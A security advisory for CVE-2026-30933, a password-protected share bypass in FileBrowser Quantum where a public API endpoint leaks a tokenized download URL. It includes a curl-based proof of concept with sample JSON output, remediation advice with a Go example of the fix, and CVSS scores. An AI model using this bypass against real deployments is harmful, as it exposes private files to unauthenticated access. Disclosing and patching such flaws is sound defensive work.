CVE-2026-30933

HIGH 7.5 | EPSS 0.11%

FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info

Published: 2026/3/9 | Modified: 2026/5/5

Description

### Summary

The remediation for CVE-2026-27611 appears incomplete. Password-protected shares still disclose a tokenized downloadURL via /public/api/share/info in the docker image gtstef/filebrowser:1.3.1-webdav-2.

### Details

The issue stems from two flaws:

1. Tokenized download URLs are written into the persistent share model:

   ```
   backend/http/share.go convertToFrontendShareResponse (line 63)
   s.DownloadURL = getShareURL(r, s.Hash, true, s.Token)
   ```

2. The public endpoint `GET /public/api/share/info` returns shareLink.CommonShare without clearing DownloadURL.

Since Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability. The previous patch removed token generation in one handler but did not address the persisted DownloadURL values or the public reflection of existing DownloadURL values.

### PoC

1. Create a password-protected share as an authenticated user.
2. Copy the public share URL (the clipboard icon WITHOUT an arrow): `http://yourdomain/public/share/yoursharedhash`. Example: `http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw`
3. Query the public share endpoint via curl: `curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*'`. Example: `curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*'`. The response includes:

   ```
   {
     "shareTheme": "default",
     "title": "Shared files - test.md",
     "description": "A share has been sent to you to view or download.",
     "disableSidebar": false,
     "downloadURL": "http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D",
     "shareURL": "http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw",
     "enforceDarkLightMode": "default",
     "viewMode": "normal",
     "shareType": "normal",
     "sidebarLinks": [
       { "name": "Share QR Code and Info", "category": "shareInfo", "target": "#", "icon": "qr_code" },
       { "name": "Download", "category": "download", "target": "#", "icon": "download" },
       { "name": "sourceLocation", "category": "custom", "target": "/srv/test.md", "icon": "" }
     ],
     "hasPassword": true,
     "disableLoginOption": false,
     "sourceURL": "/srv/test.md"
   }
   ```

   Note that the response has "hasPassword": true and the downloadURL includes a token= parameter.
4. Take the downloadURL (seen in the JSON response), replace \u0026 with &, and paste the link into an Incognito or private browser window to ensure cookies are not interfering. Example: `http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`. The browser downloads the file immediately without requiring the password.

### Impact

An unauthenticated attacker can retrieve password-protected shared files without the password. This results in authentication bypass, unauthorized file access and confidentiality compromise.

### Recommended Remediation

Sanitize DownloadURL in public share info responses via `commonShare.DownloadURL = ""` before returning the JSON response in the shareInfoHandler method located in backend/share.go. Structural fix: only generate tokenized URLs after successful password validation.
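The two-part remediation above, as an added example that is not FileBrowser Quantum's own code: CommonShare, sanitizePublicShareInfo, publicShareInfoJSON and downloadURLAfterAuth are hypothetical names modelled on the advisory's description, and the hash, token and host values are constructed placeholders.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/url"
)

// CommonShare is a hypothetical stand-in for the advisory's share model; token is unexported so json.Marshal never emits it.
type CommonShare struct {
	Hash        string `json:"hash"`
	HasPassword bool   `json:"hasPassword"`
	DownloadURL string `json:"downloadURL"`
	token       string
}

// sanitizePublicShareInfo applies the recommended remediation: the public info
// endpoint must never reflect a persisted tokenized URL.
func sanitizePublicShareInfo(s CommonShare) CommonShare {
	s.DownloadURL = ""
	return s
}

// publicShareInfoJSON renders what /public/api/share/info should return.
func publicShareInfoJSON(s CommonShare) ([]byte, error) {
	return json.Marshal(sanitizePublicShareInfo(s))
}

// downloadURLAfterAuth is the structural fix: a tokenized download URL is only
// built once the caller has validated the share password.
func downloadURLAfterAuth(base string, s CommonShare, passwordOK bool) (string, error) {
	if s.HasPassword && !passwordOK {
		return "", fmt.Errorf("share %s: password required", s.Hash)
	}
	q := url.Values{}
	q.Set("hash", s.Hash)
	if s.HasPassword {
		q.Set("token", s.token)
	}
	return base + "/public/api/resources/download?" + q.Encode(), nil
}

func main() {
	// Constructed sample: hash and token are placeholders, not real values.
	s := CommonShare{Hash: "EXAMPLEHASH", HasPassword: true, token: "EXAMPLETOKEN",
		DownloadURL: "http://example.invalid/public/api/resources/download?hash=EXAMPLEHASH&token=EXAMPLETOKEN"}
	out, _ := publicShareInfoJSON(s)
	u, err := downloadURLAfterAuth("http://example.invalid", s, false)
	fmt.Println(string(out), u, err) // no token in the public JSON; URL empty, password required
}
```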

Affected packages (2)

CVSS Score

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 4.0 | | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | HIGH 7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |

References (5)